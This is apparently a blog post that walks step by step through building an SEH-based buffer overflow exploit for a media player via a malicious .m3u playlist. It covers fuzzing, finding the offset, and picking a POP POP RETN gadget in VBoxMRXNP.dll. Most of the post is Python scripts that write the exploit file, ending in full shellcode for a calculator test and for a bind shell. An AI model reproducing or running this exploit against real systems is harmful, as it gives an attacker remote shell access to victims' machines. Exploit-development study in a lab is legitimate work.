#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk = 'A' * 5000
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
but it can't to overwrite the EIP
then i try to make fuzzer again and try to load the fuzzer (.ppl) but i got the same case. the EIP can't be overwritten.
so i try to reduce the buffer becomes 4500. and it works ...
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk = 'A' * 4500
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
then perss shift + f9
so we can see the EIP was successfully overwriten by our fuzzer.
next step, create 4500 pattern and paste it into our fuzzer.
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8A.......................Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9"
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
then, search the offset.
now try to control the EIP
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xCC\xCC\xCC\xCC"
buff+="\xDD\xCC\xBB\xAA"
file = open(nama,'w')
file.write(junk+buff)
print ("sukses ...")
file.close()
we can see the buffer AABBCCDD was succussfully entered into seh handler. the press shift+f9 to forward it. so the buffer will be overwrite the EIP.
search the module to use as stepping stone.
search the stepping stone are not compiled by SEHandler and DllCharacteristics
we can see that the module VBoxMRXNP.dll are not compiled by SEHandler and DllCharacteristics.
menu view --> executebales modules. and double click on module VBoxMRXNP.dll
then, search the sequence command POP r32, POP r32, RETN.
next step, make the payload. here i try to make payload for execute the calc for make sure our payload is correct.
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xeb\x06\x90\x90"
buff+="\xBA\x01\x01\x10"#100101BA 5E POP ESI
nop="\x90"*32
payload=("\x33\xc9\xdb\xc5\xbb\x98\x0f\xf9\x22\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x83\xc2\x04\x31\x5a\x11\x03\xc2\x1e\x1b\xd7\x0e\xc8\x9f\x18\xee"
"\x09\xab\x5c\xd2\x82\xd7\x5b\x52\x94\xc8\xef\xed\x8e\x9d\xaf\xd1"
"\xaf\x4a\x06\x9a\x84\x07\x98\x72\xd5\xd7\x02\x26\x92\x18\x40\x31"
"\x5a\x52\xa4\x3c\x9e\x88\x43\x05\x4a\x6b\xa8\x0c\x97\xf8\xef\xca"
"\x56\x14\x69\x99\x55\xa1\xfd\xc2\x79\x34\xe9\x77\x9d\xbd\xec\x6c"
"\x17\x9d\xca\x76\xeb\x2f\xd3\x12\x60\x0f\xe3\x5f\xb6\xe8\x0f\xd4"
"\x77\x05\x9b\x9a\x6b\xb8\x10\x32\x9c\x29\x2f\x49\x1c\x1d\x30\x4d"
"\x1d\xd5\x59\x71\x42\xd8\x6f\xe9\x2a\x93\x68\x6a\x12\xd8\xd8\x04"
"\xed\xc7\x3b\xa7\x79\x60\x45\xcd\x74\xc7\x45\x36\xeb\x86\xd5\xdb"
"\xec")
file = open(nama,'w')
file.write(junk+buff+nop+payload)
print ("sukses ...")
file.close()
it works... the calculator was successfully appeared.
now try to make payload for bind shell
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xeb\x06\x90\x90"
buff+="\xBA\x01\x01\x10"#100101BA 5E POP ESI
nop="\x90"*32
payload=("\xbe\xed\xb7\xbe\x26\x29\xc9\xb1\x51\xd9\xcb\xd9\x74\x24\xf4\x58"
"\x31\x70\x0e\x83\xe8\xfc\x03\x9d\xbd\x5c\xd3\xa1\xa8\x4b\x51\xb1"
"\xd4\x73\x95\xbe\x47\x07\x06\x64\xac\x9c\x92\x58\x27\xde\x19\xd8"
"\x36\xf0\xa9\x57\x21\x85\xf1\x47\x50\x72\x44\x0c\x66\x0f\x56\xfc"
"\xb6\xcf\xc0\xac\x3d\x0f\x86\xab\xfc\x5a\x6a\xb2\x3c\xb1\x81\x8f"
"\x94\x62\x42\x9a\xf1\xe0\xcd\x40\xfb\x1d\x97\x03\xf7\xaa\xd3\x4c"
"\x14\x2c\x0f\x71\x08\xa5\x46\x19\x74\xa5\x39\x22\x45\x0e\xdd\x2f"
"\xe5\x80\x95\x6f\xe6\x6b\xd9\x73\x5b\xe0\x5a\x83\xfd\x9f\xd4\xdd"
"\x0f\x8c\xb9\x1e\xd9\x2a\x69\x86\x8e\x81\xbf\x2e\x38\x95\x8d\xf1"
"\x92\xa6\x22\x65\xd0\xb4\x3f\x4e\xb6\xb9\x16\xef\xbf\xa3\xf1\x8e"
"\x2d\x23\xfc\xc5\xc7\x36\xff\x35\x7f\xee\xf6\x40\x2d\x47\xf6\x7c"
"\x7d\x3b\x5b\xd3\xd1\xf8\x08\x90\x86\x01\x7e\x70\x41\xef\x23\x1a"
"\xc2\x86\x3d\x77\x8c\x3c\xa7\x07\x8a\x6a\x27\x31\x7e\x85\x86\xe8"
"\x80\x75\x40\xb6\xd2\x58\x78\xe1\xd3\x73\x29\x58\xd3\xac\xa6\x87"
"\x62\xcb\x7e\x10\x8a\x05\xd0\xca\x20\xff\x2e\x22\x5b\x97\x37\xbb"
"\x9a\x11\xef\xc4\xf5\xb7\xf0\xea\x9c\x5d\x6b\x6c\x09\xc1\x1e\xf9"
"\x2c\x6f\xb1\xa0\x87\xbc\xb8\xb5\xb2\x78\x32\xdb\x72\x41\xb7\xb1"
"\x8b\x03\x15\x3b\x31\xa8\xf6\x4e\xcc\x88\x53\xfb\x9a\x81\xd1\x05"
"\x6f\x47\xe9\x8c\xd4\x97\xc3\x35\x82\x35\xbd\x98\x7d\xd0\x3c\x4b"
"\x2f\x71\x6e\x94\x1f\x11\x3d\xb3\xa5\x2c\x6e\xbc\x70\xda\x6e\xbd"
"\x4a\xe4\x41\xca\xe2\xe6\xe1\x08\x68\xe8\x30\xc2\x8e\xc6\xd5\x9c"
"\xa8\x05\x56\x33\xb6\x1c\x66\x63")
file = open(nama,'w')
file.write(junk+buff+nop+payload)
print ("sukses ...")
file.close()
Alhamdulillah... :D
No comments:
Post a Comment